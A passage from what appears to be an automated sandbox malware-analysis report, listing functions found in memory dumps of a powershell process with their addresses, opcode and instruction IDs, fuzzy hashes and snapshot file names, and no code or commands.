                                                • Opcode Fuzzy Hash: 34d8688741cc7e9456e3d56044b27941c720d98364382017547cd3fda19e2a93
                                                • Instruction Fuzzy Hash: BC210276504200EFDF55CF14D9C0B26BF61FB88314F20C5E9EA094A696C736D45ACB61
                                                Function 09220B7C Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: be3e17254cf4a0e5a6668289d211225ba6ee6ec065d87591e6cb19f4d6af4f86
                                                • Instruction ID: 8d5caab81dab41679ff65a32388ee30546fca29585c82aca4388217ca21d041f
                                                • Opcode Fuzzy Hash: be3e17254cf4a0e5a6668289d211225ba6ee6ec065d87591e6cb19f4d6af4f86
                                                • Instruction Fuzzy Hash: 75310774A00619DFCB14CF9DC594AAEFBB1FF88310B248299E919A7755C732EC81CB90
                                                Function 0922077D Relevance: .1, Instructions: 65COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f7a4ad7b725c69b3409dcf9452c95d8a2e9096367f5bfe36023f155ba3d4f8e
                                                • Instruction ID: 49f098317c6c91bc50cdd42c87d7dc4cdbd8765ca7f780ecd3a634edfdb62ba3
                                                • Opcode Fuzzy Hash: 3f7a4ad7b725c69b3409dcf9452c95d8a2e9096367f5bfe36023f155ba3d4f8e
                                                • Instruction Fuzzy Hash: 34115E2191F3D49FC7039739A8614893FB49E83124B1A45DBC0818F1A3DA695C4DCBA7
                                                Function 02BFF51B Relevance: .1, Instructions: 57COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2527060477.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2bfd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                • Instruction ID: 13c313160ebef791fc4af31386555becfa541df615d70f0026e404fb9b5e6439
                                                • Opcode Fuzzy Hash: 226763f8ebee4a326c53d81c1b8fbc9c4432138e5169b0b621e51b23af87bf07
                                                • Instruction Fuzzy Hash: 0F218E76504240DFCF16CF54D5C4B25BF62FB44314F24C5E9D9094A6A6C33AD45ACB91
                                                Function 02BFD01D Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2527060477.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2bfd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91041b7c222f652c39dd375e6f2d00571e86856eeb30d5f21c7af49a12aff11c
                                                • Instruction ID: b4805f9b2cb1d3cc71e44a3485d01d8049d2618de8dba754423fe9c278ec6855
                                                • Opcode Fuzzy Hash: 91041b7c222f652c39dd375e6f2d00571e86856eeb30d5f21c7af49a12aff11c
                                                • Instruction Fuzzy Hash: F501F271509341EAE7604A35C980B66BF98EF41324F08C59AEE080BA42C7B99849CAB1
                                                Function 02BFD006 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2527060477.0000000002BFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BFD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_2bfd000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7818ad52c367776aad69cff5626b2aa16b7bc6b6fb5f291ca5ac94fba6d13759
                                                • Instruction ID: 3a9a5523d25010be0b2b10a17efb6066a0bddb5bb62115d8a86c6c61e69baedd
                                                • Opcode Fuzzy Hash: 7818ad52c367776aad69cff5626b2aa16b7bc6b6fb5f291ca5ac94fba6d13759
                                                • Instruction Fuzzy Hash: A201127250E3C09FE7124B258994752BFA4DF52224F1981DBD9888F593C2699849C772
                                                Function 0922291B Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2547591871.0000000009220000.00000040.00000800.00020000.00000000.sdmp, Offset: 09220000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_9220000_powershell.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9366ac00b7c846ddfab6ef728fa0c0e2ddd36b0a41e04edc5060d6d045c007cd
                                                • Instruction ID: a6fe07c5f1331683371efaa3036383a3794bce0a2b404d990b3fcb2279e4a6c5
                                                • Opcode Fuzzy Hash: 9366ac00b7c846ddfab6ef728fa0c0e2ddd36b0a41e04edc5060d6d045c007cd
                                                • Instruction Fuzzy Hash: 9CF0F475A00115EFCB05DB9CD990EBEF776FF88324F248158EA15A72A1C732AC52CB60